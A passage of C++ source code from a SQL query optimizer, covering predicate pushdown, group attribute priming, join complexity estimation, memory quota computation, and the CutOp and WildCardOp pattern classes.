(exprId.getItemExpr()->getOperatorType() == ITM_VEG_PREDICATE) { VEG * vegPtr = ((VEGPredicate *)(exprId.getItemExpr()))->getVEG(); reqdValues += vegPtr->getVEGReference()->getValueId(); // If the VEG for this VEGPredicate contains a member that is // another VEGReference, add it to reqdValues in order to ensure // that it gets retrieved. // for (ValueId x = vegPtr->getAllValues().init(); vegPtr->getAllValues().next(x); vegPtr->getAllValues().advance(x)) { OperatorTypeEnum optype = x.getItemExpr()->getOperatorType(); if ( optype == ITM_VEG_REFERENCE ) // ********************************************************** // Note: this "if" used to have the following cases as well. // We feel that they might not be necessary any more. // || optype == ITM_INSTANTIATE_NULL || // optype == ITM_UNPACKCOL ) // ********************************************************** reqdValues += x; else if ( addInstNull && optype == ITM_INSTANTIATE_NULL ) { // part of fix to soln 10-090618-2434: a full outer join // select ... from t1 inner join t2 on ... // full outer join t3 on ... where t2.RGN = 'EMEA' // whose selection predicate "t2.RGN = <constant>" must have // its null-instantiated "t.RGN" column added to reqdValues. reqdValues += x; } } // end inner for } // endif is a VEGPredicate else { // Not a VEGPred (either a "normal" pred or a "real" value). In // any case, just add the value to the required values set. (For // a "normal" pred, it means the boolean value for the predicate // is required. // reqdValues += exprId; } } // end outer for } // computeValuesReqdForPredicates() void RelExpr::computeValuesReqdForOutput(const ValueIdSet& setOfExpr, const ValueIdSet& newExternalInputs, ValueIdSet& reqdValues) { // if VEGPreds are in the output, get the underlying VEGRefs computeValuesReqdForPredicates(setOfExpr, reqdValues); const GroupAttributes emptyGA; for (ValueId exprId = setOfExpr.init(); setOfExpr.next(exprId); setOfExpr.advance(exprId)) { if ((exprId.getType().getTypeQualifier() == NA_CHARACTER_TYPE) && (exprId.getType().getNominalSize() > CONST_32K)) { exprId.getItemExpr()->getLeafValuesForCoverTest(reqdValues, emptyGA, newExternalInputs); } } } // ----------------------------------------------------------------------- // RelExpr::pushdownCoveredExpr() // ----------------------------------------------------------------------- void RelExpr::pushdownCoveredExpr(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 childIndex ) { ValueIdSet exprToEvalOnParent, outputSet, extraHubNonEssOutputs; Int32 firstChild, lastChild; // loop bounds Int32 iter; // loop index variable NABoolean optimizeOutputs; if (getArity() == 0 ) return; // we don't do anything for leaf nodes.. if ((getOperator().match(REL_ANY_TSJ) ) || (getOperator().match(REL_ANY_GEN_UPDATE) ) ) optimizeOutputs = FALSE; else optimizeOutputs = TRUE; if (getOperator().match(REL_ANY_JOIN) && isExtraHub()) extraHubNonEssOutputs = ((Join *)this)->getExtraHubNonEssentialOutputs(); // ----------------------------------------------------------------- // Should the pushdown be attempted on a specific child? // ----------------------------------------------------------------- if ( (childIndex >= 0) AND (childIndex < getArity()) ) { // yes, a child index is given firstChild = (Int32)childIndex; lastChild = firstChild + 1; } else // no, perform pushdown on all { firstChild = 0; lastChild = getArity(); } // --------------------------------------------------------------------- // Examine the set of values required by the parent. Replace each // VEGPredicate with a VEGReferences for its VEG; if its VEG // contains other VEGReferences, add them to exprToEvalOnParent. // --------------------------------------------------------------------- if (setOfValuesReqdByParent) computeValuesReqdForPredicates(*setOfValuesReqdByParent, exprToEvalOnParent); computeValuesReqdForOutput(outputExpr,newExternalInputs,outputSet); // --------------------------------------------------------------------- // Are there any predicates that can be pushed down? // --------------------------------------------------------------------- if ( (getArity() > 0) AND (NOT predicatesOnParent.isEmpty()) ) { // ----------------------------------------------------------------- // 1) Figure out which predicates could be push to which child. // Try to give all predicates to all children. // 2) Modify predOnParent to be those predicates that no could // could take. // 3) Add to the selectionPred() of each child those predicates // it could take (if it is not a cut operator) // 4) Add to exprToEvalOnParent the predicates that could not // be push down to any child (predOnParent) // 5) Recompute the input and outputs for each child given this // set of exprOnParent. // ----------------------------------------------------------------- // Allocate an array to contain the ValueIds of external inputs // that are referenced in the given expressions. // ----------------------------------------------------------------- ValueIdSet referencedInputs[MAX_REL_ARITY]; // ----------------------------------------------------------------- // Allocate a ValueIdSet to contain the ValueIds of the roots of // sub-expressions that are covered by // a) the Group Attributes of a child and // b) the new external inputs. // Note that the containing expression is not covered for each // such sub-expression. // ----------------------------------------------------------------- ValueIdSet coveredSubExprNotUsed; // ----------------------------------------------------------------- // Allocate an array to contain the ValueIds of predicates that // can be pushed down to a specific child. // ----------------------------------------------------------------- ValueIdSet predPushSet[MAX_REL_ARITY]; // ----------------------------------------------------------------- // Check which predicate factors are fully covered by a certain // child. Gather their ValueIds in predPushSet. // ----------------------------------------------------------------- const ValueIdSet emptySet; // ----------------------------------------------------------------- // Join predicates can be pushed below a GU root as the comment a // few lines below does applies only to selection predicates // and not join predicates. The comment below indicates that in // some cases we do not wish to push a user provided predicate on // select below the GU root. These user provided predicates are // stored as selection predicates. // For MTS deletes, an anti-semi-join is used to glue the // inlined tree. For such joins all predicates that are pulled // are stored as join predicates. The change below facilitates // a push down of those predicates. The firstChild condition below // ensures that we are considering join predicates here (see // Join::pushDownCoveredExpr) // ----------------------------------------------------------------- NABoolean pushPredicateBelowGURoot = FALSE; if ((getGroupAttr()->isGenericUpdateRoot() AND getOperator() == REL_ANTI_SEMITSJ AND firstChild == 1 ) OR (NOT (getGroupAttr()->isGenericUpdateRoot()))) { pushPredicateBelowGURoot = TRUE; } for (iter = firstChild; iter < lastChild; iter++) { if (NOT child(iter).getPtr()->isCutOp()){ // QSTUFF // we don't push predicates beyond the root of a generic // update tree. This is done by pretending that those // predicates are not covered by any child. This is // required to allows us to distinguish between the // following two types of expressions: // select * from (delete from x) y where y.x > 3; // select * from (delete from x where x.x > 3) y; if (pushPredicateBelowGURoot ) { // QSTUFF child(iter).getGroupAttr()->coverTest(predicatesOnParent, newExternalInputs, predPushSet[iter], referencedInputs[iter], &coveredSubExprNotUsed); // QSTUFF } // QSTUFF } else // ---------------------------------------------------------- // If this is a cutop these predicates were already pushed // down to the child during predicate pushdown. Compute // which predicates were pushable so that we can remove them // from predOnParent and avoid creating a new group that will // later be merged // ---------------------------------------------------------- // QSTUFF // for more explanation please see comment above if ( pushPredicateBelowGURoot ) { // QSTUFF child(iter).getGroupAttr()->coverTest(predicatesOnParent, emptySet, predPushSet[iter], referencedInputs[iter], &coveredSubExprNotUsed); // QSTUFF } // QSTUFF } // for loop to perform coverTest() // ----------------------------------------------------------------- // From the original set of predicates, delete all those predicates // that will be pushed down. The remaining predicates will be // evaluated on the parent (this node). // ----------------------------------------------------------------- for (iter = firstChild; iter < lastChild; iter++) predicatesOnParent -= predPushSet[iter]; // ----------------------------------------------------------------- // Add the predicates that could not be pushed to any child to the // set of expressions to evaluate on the parent. // ----------------------------------------------------------------- computeValuesReqdForPredicates(predicatesOnParent, exprToEvalOnParent); // ----------------------------------------------------------------- // Perform predicate pushdown // ----------------------------------------------------------------- for (iter = firstChild; iter < lastChild; iter++) { if (NOT child(iter).getPtr()->isCutOp()) { // --------------------------------------------------------- // Reassign predicate factors to the appropriate children // --------------------------------------------------------- child(iter).getPtr()->selectionPred().insert(predPushSet[iter]); // --------------------------------------------------------- // Add the input values that are referenced by the predicates // that were pushed down in the above step, to the Group // Attributes of the child. // We need to call coverTest again to figure out which inputs // are needed for the predicates that will be pushdown. // --------------------------------------------------------- ValueIdSet inputsNeededByPredicates; child(iter).getGroupAttr()->coverTest(predPushSet[iter], referencedInputs[iter], predPushSet[iter], inputsNeededByPredicates, &coveredSubExprNotUsed); child(iter).getPtr()->getGroupAttr()->addCharacteristicInputs (inputsNeededByPredicates); ValueIdSet essChildOutputs; child(iter).getPtr()->getEssentialOutputsFromChildren (essChildOutputs); // ---------------------------------------------------------- // Have the child compute what output it can provide for // the expressions that remain on the parent // ---------------------------------------------------------- // TBD: Fix the hack described in // GroupAttributes::resolveCharacteristicOutputs() if(iter==1 AND getOperator().match(REL_ANY_LEFT_JOIN)) child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO (newExternalInputs, exprToEvalOnParent, outputSet, essChildOutputs, &(getSelectionPred()), TRUE, optimizeOutputs, &extraHubNonEssOutputs ); else child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO (newExternalInputs, exprToEvalOnParent, outputSet, essChildOutputs, NULL, FALSE, optimizeOutputs, &extraHubNonEssOutputs ); }; } // for loop to pushdown predicates } // endif (NOT predicatesOnParent.isEmpty()) else { // --------------------------------------------------------------------- // Compute the characteristic inputs and outputs of each child // --------------------------------------------------------------------- for (iter = firstChild; iter < lastChild; iter++) { // ----------------------------------------------------------------- // Ignore CutOps because they exist simply to facilitate // pattern matching. Their Group Attributes are actually those // of the CascadesGroup. So, don't mess with them! // ----------------------------------------------------------------- if (NOT child(iter).getPtr()->isCutOp()) { ValueIdSet essChildOutputs; child(iter).getPtr()->getEssentialOutputsFromChildren (essChildOutputs); // TBD: Fix the hack described in // GroupAttributes::resolveCharacteristicOutputs() child(iter).getPtr()->getGroupAttr()->computeCharacteristicIO (newExternalInputs, exprToEvalOnParent, outputSet, essChildOutputs, NULL, FALSE, optimizeOutputs, &extraHubNonEssOutputs ); } } // for loop to compute characteristic inputs and outputs } // endelse predicatesOnParent is empty } // RelExpr::pushdownCoveredExpr() // ----------------------------------------------------------------------- // A virtual method for computing output values that an operator can // produce potentially. // ----------------------------------------------------------------------- void RelExpr::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); Int32 nc = getArity(); // For operators that are not leaves, clear the potential outputs // and rebuild them. if (nc > 0) for (Lng32 i = 0; i < nc; i++) outputValues += child(i).getGroupAttr()->getCharacteristicOutputs(); else outputValues += getGroupAttr()->getCharacteristicOutputs(); } // RelExpr::getPotentialOutputValues() void RelExpr::getPotentialOutputValuesAsVEGs(ValueIdSet& outputs) const { getPotentialOutputValues(outputs); } // ----------------------------------------------------------------------- // primeGroupAttributes() // Initialize the Characteristic Inputs And Outputs of this operator. // ----------------------------------------------------------------------- void RelExpr::primeGroupAttributes() { // Ignore CutOps because they exist simply to facilitate // pattern matching. Their Group Attributes are actually those // of the CascadesGroup. So, don't mess with them. if (isCutOp()) return; // The method sets the characteristic outputs of a node to its // potential outputs and sets the required input to the values // it needs. It does this by calling two virtual functions // on RelExpr. ValueIdSet outputValues; getPotentialOutputValues(outputValues); getGroupAttr()->setCharacteristicOutputs(outputValues); recomputeOuterReferences(); } // RelExpr::primeGroupAttributes() // ----------------------------------------------------------------------- // allocateAndPrimeGroupAttributes() // This method is for allocating new Group Attributes for the children // of this operator that were introduced in the dataflow by a rule- // based transformation. Each new child, or set of children, intervene // between this operator and another operator that was originally a // direct child of the latter. The Group Attributes of each newly // introduced child are recursively primed with the Characteristic // Inputs and Outputs of the operators of which it is the parent. // ----------------------------------------------------------------------- void RelExpr::allocateAndPrimeGroupAttributes() { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { CMPASSERT(child(i).getMode() == ExprGroupId::STANDALONE); // Terminate the recursive descent upon reaching a CutOp. // Ignore CutOps because they exist simply to facilitate // pattern matching. Their Group Attributes are actually // those for the CascadesGroup that they belong to and // must not change. if (NOT child(i)->isCutOp()) { if (child(i).getGroupAttr() == NULL) { // A CutOp must have Group Attributes. child(i)->setGroupAttr(new (CmpCommon::statementHeap()) GroupAttributes()); } // Assign my Characteristic Inputs to my child. // This is done in order to ensure that they are propagated // recursively to all my children who are not CutOps. child(i).getPtr()->getGroupAttr() ->addCharacteristicInputs (getGroupAttr()->getCharacteristicInputs()); // Recompute the potential inputs/outputs for each real child // recursively. // Terminate the recursive descent upon encountering an // operator whose arity == 0 child(i).getPtr()->allocateAndPrimeGroupAttributes(); // Prime the Group Attributes of the child. // The following call primes the child's Characteristic Outputs. // It ensures that the inputs are minimal and outputs are maximal. child(i).getPtr()->primeGroupAttributes(); // Now compute the GroupAnalysis fields child(i).getPtr()->primeGroupAnalysis(); } // endif child is not a CutOp } // for loop } // RelExpr::allocateAndPrimeGroupAttributes() void RelExpr::getEssentialOutputsFromChildren(ValueIdSet & essOutputs) { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { essOutputs += child(i).getGroupAttr()-> getEssentialCharacteristicOutputs(); } } void RelExpr::fixEssentialCharacteristicOutputs() { ValueIdSet essChildOutputs,nonEssOutputs; getEssentialOutputsFromChildren(essChildOutputs); getGroupAttr()->getNonEssentialCharacteristicOutputs(nonEssOutputs); nonEssOutputs.intersectSet(essChildOutputs); getGroupAttr()->addEssentialCharacteristicOutputs(nonEssOutputs); } // do some analysis on the initial plan // this is called at the end of the analysis phase void RelExpr::analyzeInitialPlan() { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { child(i)->analyzeInitialPlan(); } } double RelExpr::calculateNoOfLogPlans(Lng32& numOfMergedExprs) { double result = 1; Int32 nc = getArity(); CascadesGroup* group; for (Lng32 i = 0; i < nc; i++) { if (getGroupId() == child(i).getGroupId()) { // This is a recursive reference of an expression to itself // due to a group merge. We cannot call this method on the // child, as we would end up calling this method on ourselves // again! So, we skip the recursive call on our child and // instead return an indication to our caller // (CascadesGroup::calculateNoOfLogPlans) that we encountered // a merged expression. Our caller will then know what to do // to calculate the correct number of logical expressions. numOfMergedExprs++; } else { group = (*CURRSTMT_OPTGLOBALS->memo)[child(i).getGroupId()]; result *= group->calculateNoOfLogPlans(); } } // for each child return result; } // This function is called before any optimization starts // i.e. applied to the normalizer output (reorderJoinTree OK) double RelExpr::calculateSubTreeComplexity (NABoolean& enableJoinToTSJRuleOnPass1) { double result = 0; Int32 freeLeaves = 1; // # of subtree legs that can permutate RelExpr* expr = this; while (expr) { if (expr->getGroupAttr()->isEmbeddedUpdateOrDelete() OR expr->getGroupAttr()->isStream()) { enableJoinToTSJRuleOnPass1 = TRUE; } Int32 nc = expr->getArity(); // The multi-join case if (expr->getOperatorType() == REL_MULTI_JOIN) { for (Int32 i = 0; i < nc; i++) { CascadesGroup* groupi = (*CURRSTMT_OPTGLOBALS->memo)[expr->child(i).getGroupId()]; RelExpr * expri = groupi->getFirstLogExpr(); result += expri-> calculateSubTreeComplexity(enableJoinToTSJRuleOnPass1); } freeLeaves = nc; // end the while loop expr = NULL; } // Not multi-join, and not leaf else if (nc > 0) { if (nc == 1) { // no permutation can take place across groupbys if (expr->getOperator().match(REL_ANY_GROUP)) { if (freeLeaves > 1) { // compute the last permuatation set contribution // to the complexity and start a new one result += freeLeaves * pow(2,freeLeaves-1); freeLeaves = 1; // start again } } } if (nc == 2) { double child1Complexity; CascadesGroup* group1 = (*CURRSTMT_OPTGLOBALS->memo)[expr->child(1).getGroupId()]; if (group1->getGroupAttr()->getNumBaseTables() > 1) { // Only one log expr exist in the group at this point RelExpr * expr1 = group1->getFirstLogExpr(); child1Complexity = expr1->calculateSubTreeComplexity(enableJoinToTSJRuleOnPass1); // adding this comp_bool guard in case this fix causes regressions // and we need to disable this fix. Should be taken out in a subsequent // release. (say 2.2) if (CmpCommon::getDefault(COMP_BOOL_123) == DF_OFF) { // The factor 2 accounts for the fact that the join could be a // join or a TSJ i.e. two possible logical choices. if (expr->getOperator().match(REL_ANY_NON_TSJ_JOIN)) child1Complexity = 2*child1Complexity ; } // add the right child subtree contribution to complexity result += child1Complexity; } // only REL_ANY_NON_TSJ_JOINs can permutate if (expr->getOperator().match(REL_ANY_NON_TSJ_JOIN)) freeLeaves++; // still in same permutation set else { // compute the last permuatation set contribution // to the complexity and start a new one result += freeLeaves * pow(2,freeLeaves-1); freeLeaves = 1; // start again } } // we do not handle VPJoin yet (nc==3) CascadesGroup* group0 = (*CURRSTMT_OPTGLOBALS->memo)[expr->child(0).getGroupId()]; // Only one log expr exist in the group at this point expr = group0->getFirstLogExpr(); } // leaf operators else expr = NULL; } // add last permutation set contribution result += freeLeaves * pow(2,freeLeaves-1); return result; } // calculate a query's MJ complexity, // shoud be called after MJ rewrite double RelExpr::calculateQueryMJComplexity(double &n,double &n2,double &n3,double &n4) { double result = 0; Int32 nc = getArity(); Int32 freeLeaves = nc; // # of subtree legs that can permutate RelExpr * expr = this; if (getOperatorType() == REL_MULTI_JOIN) { for (Int32 i = 0; i < nc; i++) { RelExpr * expri = expr->child(i); NABoolean childIsFullOuterJoinOrTSJ = child(i)->getGroupAnalysis()->getNodeAnalysis()-> getJBBC()->isFullOuterJoinOrTSJJBBC(); if (childIsFullOuterJoinOrTSJ) { NABoolean childIsOuterMost = !(child(i)->getGroupAnalysis()->getNodeAnalysis()-> getJBBC()->getOriginalParentJoin()); if(childIsOuterMost) freeLeaves--; } result += expri-> calculateQueryMJComplexity(n, n2, n3, n4); } //only do this for multijoins since only the children //of the multijoin will be permuted. //Note: This assumes the query tree to be the multijoinized //tree produced after multijoin rewrite in the Analyzer n += freeLeaves; n2 += pow(freeLeaves,2); n3 += pow(freeLeaves,3); n4 += pow(freeLeaves,4); result += freeLeaves * pow(2,freeLeaves-1); } else if(nc > 0) { if (nc == 1) { RelExpr * expr0 = expr->child(0); result += expr0-> calculateQueryMJComplexity(n, n2, n3, n4); } else if (nc == 2) { // only for joins, not for union // these will only be TSJ or Full Outer Joins // other joins become part of JBB if (expr->getOperator().match(REL_ANY_JOIN)) { RelExpr * expr0 = expr->child(0); result += expr0->calculateQueryMJComplexity(n, n2, n3, n4); RelExpr * expr1 = expr->child(1); result += expr1->calculateQueryMJComplexity(n, n2, n3, n4); } } } return result; } // ----------------------------------------------------------------------- // the following method is used to created a list of all scan operators // in order by size. // ----------------------------------------------------------------------- void RelExpr::makeListBySize(LIST(CostScalar) & orderedList, // order list of size NABoolean recompute) // recompute memory // limit -not used { Int32 nc = getArity(); RelExpr * expr = this; CostScalar size = 0; if (recompute) { // this needs to be filled in if this ever is redriven by costing CMPASSERT(NOT recompute); } else { if (expr->getOperatorType() == REL_SCAN OR expr->getOperatorType() == REL_GROUPBY) { //++MV, use the global empty input logical properties instead of //initializing a new one size = expr->getGroupAttr()->outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->getResultCardinality() * expr->getGroupAttr()->getRecordLength() / 1024; } } if (size > 1) // don't include anything 1KB or less { CollIndex idx = 0; for (idx = 0; idx < orderedList.entries(); idx++) { // list should be ordered by increasing estimated rowcount. if (orderedList[idx] >= size) { orderedList.insertAt (idx, size); break; } } // insert at end of list if (idx >= orderedList.entries()) { orderedList.insertAt (orderedList.entries(), size); } } for (Lng32 i = 0; i < nc; i++) { CascadesGroup* group1 = (*CURRSTMT_OPTGLOBALS->memo)[expr->child(i).getGroupId()]; // Only one log expr exist in the group at this point // if onlyMemoryOps is ever set true, we will have to traverse // the tree differently RelExpr * expr1 = group1->getFirstLogExpr(); expr1->makeListBySize(orderedList, recompute); } } // Default implementation every RelExpr returns normal priority PlanPriority RelExpr::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; // This will create normal plan priority return result; } // ----------------------------------------------------------------------- // Method for debugging // ----------------------------------------------------------------------- void RelExpr::print(FILE * f, const char * prefix, const char * suffix) const { #ifndef NDEBUG ExprNode::print(f,prefix,suffix); fprintf(f,"%sRelational Expression:\n",prefix); if (selection_ != NULL) selection_->print(f,prefix,suffix); else predicates_.print(f,prefix,suffix); // print children or input equivalence classes Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { fprintf(f,"%sExpression input %d:\n",prefix,i); if (child(i).getMode() == ExprGroupId::MEMOIZED) { fprintf(f, "%s input eq. class #%d\n", prefix, child(i).getGroupId()); } else { if (child(i).getPtr() != NULL) child(i)->print(f,CONCAT(prefix," ")); else fprintf(f,"%snonexistent child\n",prefix); } } #endif } Int32 RelExpr::nodeCount() const { Int32 result = 1; // start from me. Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) if (child(i).getPtr() != NULL) result += child(i)->nodeCount(); return result; } NABoolean RelExpr::containsNode(OperatorTypeEnum nodeType) { if (getOperatorType() == nodeType) return TRUE; Int32 nc = getArity(); for (Int32 i = 0; i < nc; i++) { if (child(i).getPtr() != NULL && child(i)->containsNode(nodeType)) return TRUE; } return FALSE; } double RelExpr::computeMemoryQuota(NABoolean inMaster, NABoolean perNode, double BMOsMemoryLimit, // in MB UInt16 totalNumBMOs, // per query double totalBMOsMemoryUsage, // for all BMOs per node in bytes UInt16 numBMOsPerFragment, // per fragment double bmoMemoryUsage, // for the current BMO/Operator per node in bytes Lng32 numStreams, double &bmoQuotaRatio ) { if ( perNode == TRUE ) { Lng32 exeMem = Lng32(BMOsMemoryLimit/(1024*1024)); // the quota is allocated in 2 parts // The constant part divided equally across all bmo operators // The variable part allocated in proportion of the given BMO operator // estimated memory usage to the total estimated memory usage of all BMOs // The ratio can be capped by the CQD double equalQuotaShareRatio = 0; equalQuotaShareRatio = ActiveSchemaDB()->getDefaults().getAsDouble(BMO_MEMORY_EQUAL_QUOTA_SHARE_RATIO); double constMemQuota = 0; double variableMemLimit = exeMem; if (equalQuotaShareRatio > 0 && totalNumBMOs > 1) { constMemQuota = (exeMem * equalQuotaShareRatio )/ totalNumBMOs; variableMemLimit = (1-equalQuotaShareRatio) * exeMem; } double bmoMemoryRatio = bmoMemoryUsage / totalBMOsMemoryUsage; bmoQuotaRatio = bmoMemoryRatio; double bmoMemoryQuotaPerNode = constMemQuota + (variableMemLimit * bmoMemoryRatio); double numInstancesPerNode = numStreams / MINOF(MAXOF(((NAClusterInfoLinux*)gpClusterInfo)->getTotalNumberOfCPUs(), 1), numStreams); double bmoMemoryQuotaPerInstance = bmoMemoryQuotaPerNode / numInstancesPerNode; return bmoMemoryQuotaPerInstance; } else { // the old way to compute quota Lng32 exeMem = getExeMemoryAvailable(inMaster); bmoQuotaRatio = BMOQuotaRatio::NO_RATIO; return exeMem / numBMOsPerFragment; } } Lng32 RelExpr::getExeMemoryAvailable(NABoolean inMaster) const { Lng32 exeMemAvailMB = ActiveSchemaDB()->getDefaults().getAsLong(EXE_MEMORY_AVAILABLE_IN_MB); return exeMemAvailMB; } // ----------------------------------------------------------------------- // methods for class RelExprList // ----------------------------------------------------------------------- void RelExprList::insertOrderByRowcount (RelExpr * expr) { Int32 i = 0; NABoolean done = FALSE; // QSTUFF // insert stream expression as the left most expression // by articially forcing it to have lowest cost // assumes that only one stream and one embedded update clause // is in the statement if (expr->getGroupAttr()->isStream() || expr->getGroupAttr()->isEmbeddedUpdateOrDelete()) { insertAt(0,expr); done = TRUE; } // QSTUFF while (!done && i < (Int32)entries()) { CostScalar thisCard = (*this)[i]-> getGroupAttr()-> getResultCardinalityForEmptyInput(); CostScalar exprCard = expr-> getGroupAttr()-> getResultCardinalityForEmptyInput(); NABoolean increasing = ((ActiveSchemaDB()->getDefaults()).getAsULong(COMP_INT_90)==1); // list should be ordered by increasing estimated rowcount. if (((thisCard >= exprCard ) && increasing) || ((thisCard < exprCard ) && !increasing)) { // QSTUFF // stream and nested updates or deletes expressions should always be // left most, i.e of lowest cost if ( (*this)[i]->getGroupAttr()->isStream() || (*this)[i]->getGroupAttr()->isEmbeddedUpdateOrDelete()) i++; // QSTUFF insertAt (i, expr); done = TRUE; } else i++; } // insert at end of list if (!done) insertAt (entries(), expr); } NABoolean RelExprList::operator== (const RelExprList &other) const { if (entries() != other.entries()) return FALSE; for (Lng32 i = 0; i < (Lng32)entries(); i++) { if ((*this)[i] != other[i]) return FALSE; } return TRUE; } NABoolean RelExprList::operator!= (const RelExprList &other) const { if ((*this) == other) return FALSE; else return TRUE; } // ----------------------------------------------------------------------- // methods for class CutOp // ----------------------------------------------------------------------- CutOp::~CutOp() {} void CutOp::print(FILE * f, const char * prefix, const char *) const { #ifndef NDEBUG if (getGroupId() == INVALID_GROUP_ID) fprintf(f, "%sLeaf (%d)\n", prefix, index_); else fprintf(f, "%sLeaf (%d, bound to group #%d)\n", prefix, index_, getGroupId()); return; #endif } Int32 CutOp::getArity () const { return 0; } NABoolean CutOp::isCutOp() const { return TRUE; } const NAString CutOp::getText() const { char theText[TEXT_DISPLAY_LENGTH]; if (getGroupId() == INVALID_GROUP_ID) sprintf(theText, "Cut (%d)", index_); else if (index_ < 99) sprintf(theText, "Cut (%d, #%d)", index_, getGroupId()); else // don't display funny indexes (>= 99) sprintf(theText, "Cut (#%d)", getGroupId()); return NAString(theText); } RelExpr * CutOp::copyTopNode(RelExpr * derivedNode, CollHeap* outHeap) { if (getGroupId() == INVALID_GROUP_ID) { // this is a standalone cut operator (e.g. in the tree of a // CONTROL QUERY SHAPE directive), return a copy of it CMPASSERT(derivedNode == NULL); CutOp* result = new (outHeap)CutOp(index_, outHeap); return RelExpr::copyTopNode(result,outHeap); } else { // CutOps are shared among the pattern and the substitute of // a rule. Often the substitute is produced by calling the copyTree() // method on the "before" expression or a part of it. This implementation // of copyTopNode() makes it possible to do that. return this; } } void CutOp::setGroupIdAndAttr(CascadesGroupId groupId) { setGroupId(groupId); // set the group attributes of the leaf node to match the group if (groupId == INVALID_GROUP_ID) setGroupAttr(NULL); else setGroupAttr((*CURRSTMT_OPTGLOBALS->memo)[groupId]->getGroupAttr()); } void CutOp::setExpr(RelExpr *e) { expr_ = e; if (expr_ == NULL) { setGroupIdAndAttr(INVALID_GROUP_ID); } else { setGroupAttr(expr_->getGroupAttr()); // ##shouldn't this line.. // setGroupIdAndAttr(expr_->getGroupId()); // ##..be replaced by this? } } // ----------------------------------------------------------------------- // methods for class SubtreeOp // ----------------------------------------------------------------------- SubtreeOp::~SubtreeOp() {} Int32 SubtreeOp::getArity() const { return 0; } NABoolean SubtreeOp::isSubtreeOp() const { return TRUE; } const NAString SubtreeOp::getText() const { return NAString("Tree Op"); } RelExpr * SubtreeOp::copyTopNode(RelExpr *, CollHeap*) { return this; } // ----------------------------------------------------------------------- // methods for class WildCardOp // ----------------------------------------------------------------------- WildCardOp::~WildCardOp() {} Int32 WildCardOp::getArity() const { switch (getOperatorType()) { case REL_ANY_LEAF_OP: case REL_FORCE_ANY_SCAN: case REL_ANY_ROUTINE: case REL_FORCE_ANY_SCALAR_UDF: case REL_ANY_SCALAR_UDF_ROUTINE: case REL_ANY_LEAF_GEN_UPDATE: case REL_ANY_LEAF_TABLE_MAPPING_UDF: return 0; case REL_ANY_UNARY_GEN_UPDATE: case REL_ANY_UNARY_OP: case REL_ANY_GROUP: case REL_FORCE_EXCHANGE: case REL_ANY_UNARY_TABLE_MAPPING_UDF: return 1; case REL_ANY_BINARY_OP: case REL_ANY_JOIN: case REL_ANY_TSJ: case REL_ANY_SEMIJOIN: case REL_ANY_SEMITSJ: case REL_ANY_ANTI_SEMIJOIN: case REL_ANY_ANTI_SEMITSJ: case REL_ANY_INNER_JOIN: case REL_ANY_NON_TS_INNER_JOIN: case REL_ANY_NON_TSJ_JOIN: case REL_ANY_LEFT_JOIN: case REL_ANY_LEFT_TSJ: case REL_ANY_NESTED_JOIN: case REL_ANY_HASH_JOIN: case REL_ANY_MERGE_JOIN: case REL_FORCE_JOIN: case REL_FORCE_NESTED_JOIN: case REL_FORCE_HASH_JOIN: case REL_FORCE_ORDERED_HASH_JOIN: case REL_FORCE_HYBRID_HASH_JOIN: case REL_FORCE_MERGE_JOIN: case REL_FORCE_ORDERED_CROSS_PRODUCT: case REL_ANY_BINARY_TABLE_MAPPING_UDF: return 2; default: ABORT("WildCardOp with unknown arity encountered"); return 0; } } NABoolean WildCardOp::isWildcard() const { return TRUE; } const NAString WildCardOp::getText() const { switch (getOperatorType()) { case ANY_REL_OR_ITM_OP: return "ANY_REL_OR_ITM_OP"; case REL_ANY_LEAF_OP: return "REL_ANY_LEAF_OP"; case REL_ANY_UNARY_OP: return "REL_ANY_UNARY_OP"; case REL_ANY_ROUTINE: return "REL_ANY_ROUTINE"; case REL_ANY_GEN_UPDATE: return "REL_ANY_GEN_UPDATE"; case REL_ANY_UNARY_GEN_UPDATE: return "REL_ANY_UNARY_GEN_UPDATE"; case REL_ANY_LEAF_GEN_UPDATE: return "REL_ANY_LEAF_GEN_UPDATE"; case REL_ANY_GROUP: return "REL_ANY_GROUP"; case REL_ANY_BINARY_OP: return "REL_ANY_BINARY_OP"; case REL_ANY_JOIN: return "REL_ANY_JOIN"; case REL_ANY_TSJ: return "REL_ANY_TSJ"; case REL_ANY_SEMIJOIN: return "REL_ANY_SEMIJOIN"; case REL_ANY_SEMITSJ: return "REL_ANY_SEMITSJ"; case REL_ANY_INNER_JOIN: return "REL_ANY_INNER_JOIN"; case REL_ANY_LEFT_JOIN: return "REL_ANY_LEFT_JOIN"; case REL_ANY_LEFT_TSJ: return "REL_ANY_LEFT_TSJ"; case REL_ANY_NESTED_JOIN: return "REL_ANY_NESTED_JOIN"; case REL_ANY_HASH_JOIN: return "REL_ANY_HASH_JOIN"; case REL_ANY_MERGE_JOIN: return "REL_ANY_MERGE_JOIN"; case REL_FORCE_ANY_SCAN: return "REL_FORCE_ANY_SCAN"; case REL_FORCE_EXCHANGE: return "REL_FORCE_EXCHANGE"; case REL_FORCE_JOIN: return "REL_FORCE_JOIN"; case REL_FORCE_NESTED_JOIN: return "REL_FORCE_NESTED_JOIN"; case REL_FORCE_HASH_JOIN: return "REL_FORCE_HASH_JOIN"; case REL_FORCE_HYBRID_HASH_JOIN: return "REL_FORCE_HYBRID_HASH_JOIN"; case REL_FORCE_ORDERED_HASH_JOIN: return "REL_FORCE_ORDERED_HASH_JOIN"; case REL_FORCE_MERGE_JOIN: return "REL_FORCE_MERGE_JOIN"; default: return "unknown??"; } } RelExpr * WildCardOp::copyTopNode(RelExpr * derivedNode, CollHeap* outHeap) { if (corrNode_ != NULL) return corrNode_->copyTopNode(0, outHeap); else { if (derivedNode != NULL) return derivedNode; else { WildCardOp* result; result = new (outHeap) WildCardOp(getOperatorType(), 0, NULL, NULL, outHeap); return RelExpr::copyTopNode(result,outHeap); } } return NULL; // shouldn't really reach here } // 